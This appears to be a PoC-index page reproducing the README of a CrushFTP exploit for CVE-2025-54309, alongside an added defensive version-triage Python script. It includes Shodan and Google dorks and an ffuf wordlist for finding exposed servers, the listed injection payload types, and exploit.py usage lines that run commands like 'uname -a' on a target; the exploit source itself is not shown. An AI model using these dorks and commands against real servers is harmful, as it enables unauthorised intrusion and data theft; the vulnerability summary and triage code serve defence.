CVE-2025-54309 PoC: CrushFTP security vulnerability

Associated Vulnerability
Title: CrushFTP security vulnerability (CVE-2025-54309)
Description:CrushFTP 10 before 10.8.5 and 11 before 11.3.4_23, when the DMZ proxy feature is not used, mishandles AS2 validation and consequently allows remote attackers to obtain admin access via HTTPS, as exploited in the wild in July 2025.
Description
CrushFTP Unauthenticated Remote Command Execution Exploit
Readme
# 💥 CVE-2025-54309 - CrushFTP Unauthenticated Remote Command Execution Exploit

> **PoC by Issam Junior**  
> [![GitHub](https://img.shields.io/badge/GitHub-issamjr-181717?logo=github&logoColor=white)](https://github.com/issamjr)
> [![Twitter](https://img.shields.io/badge/Twitter-@issam_juniorx-1DA1F2?logo=twitter&logoColor=white)](https://x.com/issam_juniorx)
> [![Telegram](https://img.shields.io/badge/Telegram-issamiso-26A5E4?logo=telegram&logoColor=white)](https://t.me/issamiso)

---

## 🚨 Vulnerability Overview

- **CVE:** CVE-2025-54309
- **CVSS:** 9.0 (Critical) per NVD (CVSS v3.1)
- **Product:** CrushFTP 10 and 11 (see affected versions below)
- **Impact:** Unauthenticated admin access over HTTPS according to the CVE record; the PoC author presents this as unauthenticated Remote Command Execution (RCE)

CrushFTP, a widely deployed enterprise managed file transfer server, mishandles AS2 validation on its HTTPS interface when the DMZ proxy feature is not in use (see the CVE record above). As a result, remote attackers can reach the admin interface over HTTPS without credentials; this PoC claims to turn that access into command execution on the host. The flaw was exploited in the wild in July 2025.

### Technical Breakdown

According to the PoC author, the exploit sends a crafted XML-RPC-style request to the `/WebInterface/function/` endpoint and obtains command execution **without authentication**. Note that the CVE record attributes the flaw to incomplete AS2 validation, not to the DMZ proxy: deployments that front CrushFTP with the DMZ proxy are described as not affected, and the weakness is reachable only when the DMZ proxy feature is not used. Admin access to a file transfer server is enough for full server compromise, data theft, and lateral movement.

**Affected Versions:**  
> CrushFTP 10 before 10.8.5 and CrushFTP 11 before 11.3.4_23 (per the CVE record). Upgrade to 10.8.5 / 11.3.4_23 or later, and check the vendor advisory for current guidance.
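The version ranges above are easy to get wrong by hand because CrushFTP appends a build number after an underscore (11.3.4 without the `_23` build is still affected). The following Python triage helper is an added example for this page, not code from the PoC repository or from CrushFTP: it parses a version string in the `major.minor.patch[_build]` form used in the CVE text (that format is an assumption taken from the advisory wording), compares it against the first fixed release of each branch, and honours the CVE's scoping that instances fronted by the DMZ proxy are not exposed. The inventory it runs over is constructed sample data; the host names do not exist.

```python
"""Version triage for CVE-2025-54309 (CrushFTP).

Added example for this page; not part of the PoC repository or of CrushFTP.
Fixed versions come from the CVE description: 10.x is fixed in 10.8.5 and
11.x in 11.3.4_23. The version-string format "major.minor.patch[_build]"
(e.g. 11.3.4_23) is an assumption taken from that text, and the inventory
below is constructed sample data.
"""
import re
from typing import Dict, Tuple

# First fixed release per major version, from the CVE record.
FIXED_IN = {10: "10.8.5", 11: "11.3.4_23"}

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(?:_(\d+))?$")


def parse_version(text: str) -> Tuple[Tuple[int, ...], int]:
    """Split '11.3.4_23' into ((11, 3, 4), 23); a missing build counts as 0."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised CrushFTP version string: {text!r}")
    release = tuple(int(p) for p in m.group(1).split("."))
    release += (0,) * max(0, 3 - len(release))  # '10.8' compares as 10.8.0
    build = int(m.group(2)) if m.group(2) else 0
    return release, build


def assess(version: str, dmz_proxy_in_use: bool = False) -> str:
    """Return 'vulnerable', 'fixed', 'not_exposed' or 'unknown' for one install.

    The CVE text scopes the flaw to deployments where the DMZ proxy feature is
    not used, so DMZ-fronted instances are reported as not exposed even on an
    unpatched version (they still need the upgrade).
    """
    if dmz_proxy_in_use:
        return "not_exposed"
    release, build = parse_version(version)
    fixed = FIXED_IN.get(release[0])
    if fixed is None:
        return "unknown"  # the CVE record only names the 10.x and 11.x branches
    return "vulnerable" if (release, build) < parse_version(fixed) else "fixed"


# Constructed sample inventory (host,version,dmz_proxy); these hosts do not exist.
SAMPLE_INVENTORY = """\
# host,version,dmz_proxy
mft-a.example.test,11.3.4_22,no
mft-b.example.test,11.3.4_23,no
mft-c.example.test,10.8.4,yes
mft-d.example.test,10.8.4,no
mft-e.example.test,11.3.4,no
mft-f.example.test,9.4.1,no
"""


def triage(inventory: str) -> Dict[str, str]:
    """Map each host in a CSV inventory to its assess() status."""
    results: Dict[str, str] = {}
    for line in inventory.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host, version, dmz = (field.strip() for field in line.split(","))
        results[host] = assess(version, dmz.lower() in ("yes", "true", "1"))
    return results


if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host:22} {status}")
```

The comparison is done on the `(release, build)` tuple so that `11.3.4` (build 0) sorts below `11.3.4_23` and is correctly flagged, while `11.3.5` sorts above it. A version check cannot tell you whether the DMZ proxy is in front of an instance, which is why that fact is a separate input; a `not_exposed` result is not a reason to skip the upgrade.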

---

## 🕵️‍♂️ Dorks for Hunting CrushFTP Servers

### 🔎 Shodan Dorks
```
http.favicon.hash:427298725 "CrushFTP"
http.html:"CrushFTP"
product:"CrushFTP"
ssl:"CrushFTP"
port:443 "CrushFTP"
```

### 🦊 Ffuf Wordlist (URL Discovery)
```
/WebInterface/function/
/WebInterface/login/
/WebInterface/json/
/WebInterface/info/
/favicon.ico
```

### 🕷️ Other Search Engine Dorks (Google, Censys, Hunter, etc.)
```
title:"CrushFTP WebInterface"
"Powered by CrushFTP"
inurl:/WebInterface/function/
inurl:/WebInterface/login/
```

---

## ⚡ Exploit Features

- **Multiple Payloads:**
  - **xml**: XML-RPC command injection (default; the author describes it as the most reliable).
  - **cmd_inject**: Classic command injection via POST parameters.
  - **json**: JSON-based RCE attempt, only where the endpoint supports it (labelled a simulation by the author).
  - **file_upload**: Simulated arbitrary file write (upload); as a simulation it does not by itself demonstrate the vulnerability.
- **Recon Mode:**
  - Fingerprints CrushFTP version.
  - Scans for interesting endpoints and methods.
- **Output Parsing:**
  - Extracts and highlights command output from responses.

---

## ⚡ Exploit Usage

### 1. Install Dependencies

```bash
pip install -r requirements.txt
```

### 2. Run the Exploit

```bash
python3 exploit.py <target> [-c <cmd>] [-p <payload>] [--recon]
```

- `<target>`: IP or domain of the vulnerable CrushFTP server.
- `-c <cmd>`: (Optional) Command to execute. Defaults to `id`.
- `-p <payload>`: (Optional) Payload type. Options: `xml`, `cmd_inject`, `json`, `file_upload` (default: `xml`).
- `--upload-file <filename>` and `--upload-data <data>`: Used with `file_upload` payload type.
- `--recon`: Run endpoint scan & version fingerprint.

**Examples:**

- XML-RPC RCE (default):
  ```bash
  python3 exploit.py 192.168.1.100 -c "uname -a"
  ```

- Command Injection via login:
  ```bash
  python3 exploit.py 192.168.1.100 -c "whoami" -p cmd_inject
  ```

- File Upload (simulated):
  ```bash
  python3 exploit.py 192.168.1.100 -p file_upload --upload-file "/tmp/pwned.txt" --upload-data "CrushFTP hacked by Issam Junior"
  ```

- Reconnaissance:
  ```bash
  python3 exploit.py 192.168.1.100 --recon
  ```

---

### 3. Output

- **Green**: Successful exploitation and command output.
- **Red**: Errors (network issues, non-vulnerable target).
- **Yellow**: Warnings (unexpected response).

---

## ⚠️ Disclaimer

> **This PoC is for educational purposes only.  
> Do not use on systems without authorization.  
> You are solely responsible for your actions.**

---

## 👤 Author & Socials

- **Name:** Issam Junior


File Snapshot

```
/data/pocs/f358f181106c71a16419bd858a72166aca2eeabc
├── exploit.py        (8.4K)
├── LICENSE           (1.0K)
├── README.md         (4.2K)
└── requirements.txt  (19 bytes)

0 directories, 4 files
```